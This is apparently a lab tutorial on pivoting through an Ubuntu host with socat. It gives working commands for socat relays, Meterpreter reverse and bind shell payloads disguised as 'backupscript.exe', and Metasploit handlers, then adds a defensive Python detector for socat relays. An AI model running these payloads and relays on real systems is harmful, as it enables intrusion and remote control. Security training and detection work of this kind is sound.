Playing Pong with Socat
Socat Redirection with a Reverse Shell
Socat is a bidirectional relay tool that can create pipe sockets between two independent network channels without needing SSH tunneling.
We can start Metasploit's listener on our attack host using the same command mentioned in the last section, and start socat on the Ubuntu server:
socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80
Socat will listen locally on port 8080 and forward all traffic to port 80 on our attack host (10.10.14.18).
We then create a payload for the Windows target that points at the Ubuntu server running socat, and start our multi_handler on the attack machine:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<UbuntuIP> -f exe -o backupscript.exe LPORT=8080
(the payload calls back to the Ubuntu server on port 8080, where socat is listening; the handler on our attack host needs port 80, which is where socat forwards the traffic)
sudo msfconsole
msf6 > use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 80
run
We can test this by running our payload on the Windows host again; this time we should see the network connection arriving from the Ubuntu server rather than from the Windows host.
Socat Redirection with a Bind Shell
Similar to the socat reverse shell redirector, we can also create a socat bind shell redirector. This differs from reverse shells, which connect back from the Windows server to the Ubuntu server and get redirected to our attack host.
In the case of bind shells, the Windows server starts a listener bound to a particular port. We can create a bind shell payload for Windows and execute it on the Windows host.
At the same time, we can create a socat redirector on the Ubuntu server, which listens for incoming connections from a Metasploit bind handler and forwards them to the bind shell payload on the Windows target. The figure below illustrates the pivot.

Creating the Windows Payload
msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupscript.exe LPORT=8443
We can start a socat bind shell listener, which listens on port 8080 and forwards packets to the Windows server on port 8443.
socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443
172.16.5.19 is the Windows IP.
msf6 > use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 10.129.202.64
set LPORT 8080
run
Establishing Meterpreter Session
meterpreter > getuid
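Both redirectors above have the same shape on the Ubuntu box: a `socat` process with one `TCP4-LISTEN:<port>,fork` address and one `TCP4:<host>:<port>` address. From the defender's side, that command line is the artifact to look for in process listings (`ps -eo args`) or auditd EXECVE records. The following is an added example, not part of the original notes: it parses socat address specifications from constructed command lines, extracts the listen port and forward target, and labels a relay as pointing out of or into the target segment. The sample command lines and the `172.16.5.0/24` internal prefix are assumptions made for the example, chosen to match the addresses used on this page.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample command lines, as they might appear in `ps -eo args`
# output or the argv of an auditd EXECVE record. Not taken from a real host.
SAMPLE_CMDLINES = [
    "socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80",      # reverse shell redirector
    "socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443",    # bind shell redirector
    "socat TCP-LISTEN:2222,reuseaddr,fork TCP:localhost:22",
    "socat - TCP4:example.internal:25",                      # STDIO client, not a relay
    "sshd: ubuntu [priv]",
]

# Assumed internal segment for this lab (the Windows host 172.16.5.19 lives here).
INTERNAL_NETS = [ipaddress.ip_network("172.16.5.0/24")]

# socat address syntax: TYPE:params,option,option ...
LISTEN_RE = re.compile(r"^TCP[46]?-LISTEN:(\d+)((?:,[^ ]*)?)$", re.I)
CONNECT_RE = re.compile(r"^TCP[46]?:([^:,]+):(\d+)(?:,.*)?$", re.I)


@dataclass
class SocatRelay:
    listen_port: int
    forward_host: str
    forward_port: int
    forked: bool  # ",fork" means every inbound client gets its own forwarded connection


def parse_socat_relay(cmdline: str) -> Optional[SocatRelay]:
    """Return a SocatRelay if the command line is a socat listen-and-forward relay."""
    parts = cmdline.split()
    if not parts or parts[0].rsplit("/", 1)[-1] != "socat":
        return None
    # Drop option flags and the "-" STDIO address; a relay has exactly two addresses.
    addrs = [p for p in parts[1:] if not p.startswith("-")]
    if len(addrs) != 2:
        return None
    listen = [LISTEN_RE.match(a) for a in addrs]
    connect = [CONNECT_RE.match(a) for a in addrs]
    # socat accepts the two addresses in either order.
    for i in range(2):
        lm, cm = listen[i], connect[1 - i]
        if lm and cm:
            opts = lm.group(2).lower().split(",")
            return SocatRelay(int(lm.group(1)), cm.group(1), int(cm.group(2)), "fork" in opts)
    return None


def classify(relay: SocatRelay, internal_nets) -> str:
    """Label where the relay sends traffic relative to the internal segment."""
    try:
        ip = ipaddress.ip_address(relay.forward_host)
    except ValueError:
        return "unresolved-hostname"  # DNS name; resolve before deciding
    if any(ip in net for net in internal_nets):
        return "relay-to-internal"  # inbound pivot, e.g. towards a bind shell
    return "relay-to-external"      # traffic leaving the segment, e.g. a reverse shell callback


def find_relays(cmdlines: List[str], internal_nets) -> List[Tuple[SocatRelay, str]]:
    """Scan command lines and return every socat relay with its classification."""
    findings = []
    for line in cmdlines:
        relay = parse_socat_relay(line)
        if relay is not None:
            findings.append((relay, classify(relay, internal_nets)))
    return findings


if __name__ == "__main__":
    for relay, label in find_relays(SAMPLE_CMDLINES, INTERNAL_NETS):
        print(f"{label}: :{relay.listen_port} -> {relay.forward_host}:{relay.forward_port} fork={relay.forked}")
```

A socat relay with `fork` on a server that has no business forwarding traffic is a strong signal on its own; the classification only helps triage which direction the pivot runs. In practice the same parser can be pointed at a process listing collected from the host or at EXECVE records shipped to a SIEM.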